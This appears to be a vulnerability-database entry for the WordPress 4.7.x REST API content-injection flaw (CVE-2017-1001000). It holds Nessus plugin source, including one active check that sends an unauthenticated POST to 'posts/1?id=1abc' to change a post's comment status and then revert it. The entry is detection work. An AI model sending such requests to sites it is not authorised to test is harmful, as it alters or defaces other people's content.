Vulnerabilities > CVE-2017-1001000 - Unspecified vulnerability in Wordpress 4.7/4.7.1/4.7.2

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
HIGH
Availability impact
NONE

Summary

The register_routes function in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php in the REST API in WordPress 4.7.x before 4.7.2 does not require an integer identifier, which allows remote attackers to modify arbitrary pages via a request for wp-json/wp/v2/posts followed by a numeric value and a non-numeric value, as demonstrated by the wp-json/wp/v2/posts/123?id=123helloworld URI.

Vulnerable Configurations

Part Description Count
Application
Wordpress
3

Metasploit

description: This module exploits a content injection vulnerability in WordPress versions 4.7 and 4.7.1 via type juggling in the REST API.
id: MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_CONTENT_INJECTION
last seen: 2020-06-13
modified: 2019-06-05
published: 2017-02-03
references:
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wordpress_content_injection.rb
title: WordPress REST API Content Injection

Nessus

  • NASL family: CGI abuses
    NASL id: WORDPRESS_REST_API_PRIV_ESC.NASL
    description: The WordPress application running on the remote web server is version 4.7.x prior to 4.7.2. It is, therefore, affected by a privilege escalation vulnerability in the REST API due to a failure to properly sanitize user-supplied input to the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 97210
    published: 2017-02-16
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/97210
    title: WordPress 4.7.x < 4.7.2 REST API 'id' Parameter Privilege Escalation
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    # Plugin registration: Nessus sets `description` while loading the plugin,
    # so this branch only publishes metadata and exits without touching the target.
    if (description)
    {
      script_id(97210);
      script_version("1.6");
      script_cvs_date("Date: 2019/11/13");
    
      script_cve_id("CVE-2017-1001000");
      # Exploit-DB cross references for the same REST API 'id' handling flaw.
      script_xref(name:"EDB-ID", value:"41223");
      script_xref(name:"EDB-ID", value:"41224");
      script_xref(name:"EDB-ID", value:"41308");
    
      script_name(english:"WordPress 4.7.x < 4.7.2 REST API 'id' Parameter Privilege Escalation");
      # Active check: the plugin body really toggles a post's comment_status.
      script_summary(english:"Attempts to disable comments on a blog post.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server hosts a PHP script that is affected by a
    privilege escalation vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The WordPress application running on the remote web server is version
    4.7.x prior to 4.7.2. It is, therefore, affected by a privilege
    escalation vulnerability in the REST API due to a failure to properly
    sanitize user-supplied input to the 'id' parameter when editing or
    deleting blog posts. An unauthenticated, remote attacker can exploit
    this issue to run arbitrary PHP code, inject content into blog posts,
    modify blog post attributes, or delete blog posts.
    
    The WordPress REST API is enabled by default as of version 4.7.0. This
    vulnerability was silently patched in WordPress version 4.7.2.
    
    Note that WordPress is reportedly affected by additional
    vulnerabilities; however, Nessus has not tested for these.");
      # https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?49ca66d9");
      # https://blog.sucuri.net/2017/02/wordpress-rest-api-vulnerability-abused-in-defacement-campaigns.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?172a71ca");
      script_set_attribute(attribute:"see_also", value:"https://thehackernews.com/2017/02/wordpress-hack-seo.html");
      # https://github.com/WordPress/WordPress/commit/89d7d9e70f7d33f4064ca884fa9f30f48b69655e
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f1dc5ff8");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to WordPress version 4.7.2 or later.");
      # Integrity-only impact: the flaw lets unauthenticated writes through, but
      # discloses nothing and does not take the service down.
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-1001000");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/02/01");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/01/26");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/02/16");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
      script_end_attributes();
    
      # Destructive category because the check writes to the target: it changes
      # a post's comment_status and then tries to set it back.
      script_category(ACT_DESTRUCTIVE_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      # Runs only after the WordPress detector has recorded an install and its version.
      script_dependencies("wordpress_detect.nasl");
      script_require_keys("installed_sw/WordPress", "www/PHP");
      script_require_ports("Services/www", 80);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    include("url_func.inc");
    include("json.inc");
    
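    # Scan state: `vuln` becomes TRUE only once a flipped comment_status is
    # observed in the REST response (see the check further down).
    vuln = FALSE;
    app = "WordPress";
    get_install_count(app_name:app, exit_if_zero:TRUE);
    
    port = get_http_port(default:80, php:TRUE);
    
    # Exits when the detector could not establish a version; the version
    # gate below depends on it.
    install = get_single_install(
      app_name : app,
      port     : port,
      exit_if_unknown_ver : TRUE
    );
    
    dir = install['path'];
    ver = install['version'];
    # Full URL of the install, used only in audit/report messages.
    install_url = build_url(port:port, qs:dir);
    
    # Base path for the REST requests: the detector's redirect target when it
    # recorded one, otherwise the install directory with a trailing slash so
    # endpoint paths can be appended directly.
    url = dir + "/";
    url_path = install['Redirect'];
    if (!isnull(url_path)) url = url_path;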
    
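    # Returns the JSON body that flips a post's comment_status to the value
    # opposite the one supplied ("open" -> "closed", anything else -> "open").
    function flip_comment_status(status)
    {
      if ("open" >< status) return '{"comment_status":"closed"}';
      return '{"comment_status":"open"}';
    }
    
    # POSTs a JSON body to one REST API path on the given port and returns the
    # http_send_recv3() result. exit_on_fail keeps the plugin's existing
    # behaviour of ending the scan when the transport itself fails.
    function post_json(port, item, data)
    {
      return http_send_recv3(
        method       : "POST",
        item         : item,
        data         : data,
        add_headers  : make_array("Content-Type", "application/json"),
        port         : port,
        exit_on_fail : TRUE
      );
    }
    
    # Check if version is 4.7.x < 4.7.2; only that range lacks the integer
    # requirement on the REST route's 'id' argument.
    if (ver =~ '^4\\.7' && ver_compare(ver:ver, fix:'4.7.2', strict:FALSE) < 0) {
    
      # Post id 1 is the default 'Hello World' post, so every install should
      # have it. Paths are built on `url` (the detected install path) so an
      # install below a sub-directory is probed at the right location instead
      # of the web root.
      post_url   = url + "wp-json/wp/v2/posts/1";
      # Same post addressed with a numeric id carrying a non-numeric suffix,
      # the shape of request the unpatched route accepts.
      attack_url = post_url + "?id=1abc";
    
      # Read the current comment_status and link first so the change can be
      # detected and undone.
      res1 = http_send_recv3(
        method       : "GET",
        item         : post_url,
        add_headers  : make_array("Content-Type", "application/json"),
        port         : port,
        exit_on_fail : TRUE
      );
    
      if ("200 OK" >!< res1[0] || "modified_gmt" >!< res1[2])
        audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);
    
      json_data = json_read(res1[2]);
      orig_comment_status = json_data[0]['comment_status'];
      link = json_data[0]['link'];
      # Without a baseline the write could be neither judged nor undone, so
      # bail out before sending it.
      if (empty_or_null(orig_comment_status))
        audit(AUDIT_RESP_BAD, port, 'REST API requests');
    
      # Attempt exploit on blog post by changing comment_status and verify if
      # vuln: a 200 response echoing the flipped value means the API accepted
      # the write through the malformed id.
      postdata = flip_comment_status(status:orig_comment_status);
      res2 = post_json(port:port, item:attack_url, data:postdata);
      attack_req = http_last_sent_request();
    
      if ("200 OK" >!< res2[0] || "modified_gmt" >!< res2[2])
        audit(AUDIT_RESP_BAD, port, 'REST API requests');
    
      json_data = json_read(res2[2]);
      changed_comment_status = json_data[0]['comment_status'];
      if (empty_or_null(changed_comment_status))
        exit(0, 'The comment_status value could not be parsed from the JSON response.');
      if (changed_comment_status >< orig_comment_status)
        audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);
      vuln = TRUE;
    
      # The write succeeded, so flip the value back the same way. From here on
      # the finding is always reported: the target has been modified, so a
      # failed or unverifiable restore must not silently drop the result; it
      # is recorded in the report text instead.
      postdata = flip_comment_status(status:changed_comment_status);
      res3 = post_json(port:port, item:attack_url, data:postdata);
    
      restored = FALSE;
      if ("200 OK" >< res3[0] && "modified_gmt" >< res3[2]) {
        json_data = json_read(res3[2]);
        verify_comment_status = json_data[0]['comment_status'];
        if (!empty_or_null(verify_comment_status) && verify_comment_status >< orig_comment_status)
          restored = TRUE;
      }
    
      reset = 'Nessus was able to set the comment_status to "' + changed_comment_status + '"\n';
      if (restored) {
        reset += 'and then reset the comment_status back to "' + orig_comment_status + '" for the\n';
        reset += 'following blog post:\n';
        reset += '\n';
        reset += link + '\n';
        reset += '\n';
      } else {
        reset += 'but was not able to reset the comment_status back to "' + orig_comment_status + '" for the\n';
        reset += 'following blog post:\n';
        reset += '\n';
        reset += link + '\n';
        reset += '\n';
        reset += 'This post should be manually reviewed by a WordPress administrator to see\n';
        reset += 'if commenting is still allowed on the post.\n';
      }
    
    # Audit out if version is not 4.7.x < 4.7.2
    } else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);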
    
    
    # Not affected unless the toggled comment_status was actually observed;
    # audit() ends the plugin, so everything below is the vulnerable path.
    if (!vuln) audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, ver);
    
    # Report the request that demonstrated the write plus the restore outcome.
    security_report_v4(
      port      : port,
      severity  : SECURITY_WARNING,
      generic   : TRUE,
      request   : make_list(attack_req),
      rep_extra : reset
    );
    exit(0);
    
  • NASL family: CGI abuses
    NASL id: WORDPRESS_4_7_2.NASL
    description: According to its self-reported version number, the WordPress application running on the remote web server is prior to 4.7.2. It is, therefore, affected by multiple vulnerabilities : - An information disclosure vulnerability exists in the class-wp-press-this.php script due to a failure to properly restrict the user interface for assigning taxonomy terms. An authenticated, remote attacker can exploit this to disclose sensitive information. (CVE-2017-5610) - A SQL injection (SQLi) vulnerability exists in the class-wp-query.php script due to a failure to sanitize input to post type names. An unauthenticated, remote attacker can exploit this to inject or manipulate SQL queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data. (CVE-2017-5611) - A cross-site scripting (XSS) vulnerability exists in the class-wp-posts-list-table.php script due to improper validation of input to the posts list table. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 96906
    published: 2017-01-31
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/96906
    title: WordPress < 4.7.2 Multiple Vulnerabilities
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    # Plugin registration: Nessus sets `description` while loading the plugin,
    # so this branch only publishes metadata and exits without scanning.
    if (description)
    {
      script_id(96906);
      script_version("1.8");
      script_cvs_date("Date: 2019/03/29  9:51:59");
    
      # All four issues fixed in the 4.7.2 security release (and its backports).
      script_cve_id(
        "CVE-2017-5610",
        "CVE-2017-5611",
        "CVE-2017-5612",
        "CVE-2017-1001000"
      );
      script_bugtraq_id(95816);
      script_xref(name:"EDB-ID", value:"41223");
      script_xref(name:"EDB-ID", value:"41224");
      script_xref(name:"EDB-ID", value:"41308");
    
      script_name(english:"WordPress < 4.7.2 Multiple Vulnerabilities");
      # Version-only check: nothing is exercised on the target.
      script_summary(english:"Checks the version of WordPress.");
    
      script_set_attribute(attribute:"synopsis", value:
    "A PHP application running on the remote web server is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "According to its self-reported version number, the WordPress
    application running on the remote web server is prior to 4.7.2.
    It is, therefore, affected by multiple vulnerabilities :
    
      - An information disclosure vulnerability exists in the
        class-wp-press-this.php script due to a failure to
        properly restrict the user interface for assigning
        taxonomy terms. An authenticated, remote attacker can
        exploit this to disclose sensitive information.
        (CVE-2017-5610)
    
      - A SQL injection (SQLi) vulnerability exists in the
        class-wp-query.php script due to a failure to sanitize
        input to post type names. An unauthenticated, remote
        attacker can exploit this to inject or manipulate SQL
        queries in the back-end database, resulting in the
        disclosure or manipulation of arbitrary data.
        (CVE-2017-5611)
    
      - A cross-site scripting (XSS) vulnerability exists in the
        class-wp-posts-list-table.php script due to improper
        validation of input to the posts list table. An
        unauthenticated, remote attacker can exploit this, via a
        specially crafted request, to execute arbitrary script
        code in a user's browser session. (CVE-2017-5612)
    
      - A privilege escalation vulnerability exists in the REST
        API due to a failure to properly sanitize user-supplied
        input to the 'id' parameter when editing or deleting
        blog posts. An unauthenticated, remote attacker can
        exploit this issue to run arbitrary PHP code, inject
        content into blog posts, modify blog post attributes, or
        delete blog posts. (CVE-2017-1001000)
    
    Note that Nessus has not tested for these issues but has instead
    relied only on the application's self-reported version number.");
      script_set_attribute(attribute:"see_also", value:"https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/");
      script_set_attribute(attribute:"see_also", value:"https://codex.wordpress.org/Version_4.7.2");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to WordPress version 4.7.2 or later.");
      # Score is taken from the SQLi (CVE-2017-5611), the most severe of the set.
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5611");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/01/26");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/01/26");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/01/31");
    
      # Marked potential because the result rests on the self-reported version;
      # the body also requires the paranoid report setting.
      script_set_attribute(attribute:"potential_vulnerability", value:"true");
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:wordpress:wordpress");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("wordpress_detect.nasl");
      script_require_keys("www/PHP", "installed_sw/WordPress", "Settings/ParanoidReport");
      script_require_ports("Services/www", 80, 443);
    
      exit(0);
    }
    
    include("vcf.inc");
    include("http.inc");
    
    # Version-only check: run only when the scan's paranoia setting allows
    # findings based on a self-reported version number.
    if (report_paranoia < 2) audit(AUDIT_PARANOID);
    
    port = get_http_port(default:80, php:TRUE);
    app  = "WordPress";
    
    # Requires at least two version segments so "4" alone cannot match a branch.
    wp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);
    vcf::check_granularity(app_info:wp_info, sig_segments:2);
    
    # One entry per maintained branch that received the 4.7.2 backports:
    # min_version selects the branch, fixed_version is its patched release.
    branch_fixes = make_list(
      make_array("min_version", "3.5", "fixed_version", "3.7.18", "fixed_display", "3.7.18 / 4.7.2"),
      make_array("min_version", "3.8", "fixed_version", "3.8.18", "fixed_display", "3.8.18 / 4.7.2"),
      make_array("min_version", "3.9", "fixed_version", "3.9.16", "fixed_display", "3.9.16 / 4.7.2"),
      make_array("min_version", "4.0", "fixed_version", "4.0.15", "fixed_display", "4.0.15 / 4.7.2"),
      make_array("min_version", "4.1", "fixed_version", "4.1.15", "fixed_display", "4.1.15 / 4.7.2"),
      make_array("min_version", "4.2", "fixed_version", "4.2.12", "fixed_display", "4.2.12 / 4.7.2"),
      make_array("min_version", "4.3", "fixed_version", "4.3.8",  "fixed_display", "4.3.8 / 4.7.2"),
      make_array("min_version", "4.4", "fixed_version", "4.4.7",  "fixed_display", "4.4.7 / 4.7.2"),
      make_array("min_version", "4.5", "fixed_version", "4.5.6",  "fixed_display", "4.5.6 / 4.7.2"),
      make_array("min_version", "4.6", "fixed_version", "4.6.3",  "fixed_display", "4.6.3 / 4.7.2"),
      make_array("min_version", "4.7", "fixed_version", "4.7.2",  "fixed_display", "4.7.2")
    );
    
    # The xss/sqli flags tag the finding for the corresponding report filters.
    vcf::check_version_and_report(
      app_info    : wp_info,
      constraints : branch_fixes,
      severity    : SECURITY_HOLE,
      flags       : make_array("xss", TRUE, "sqli", TRUE)
    );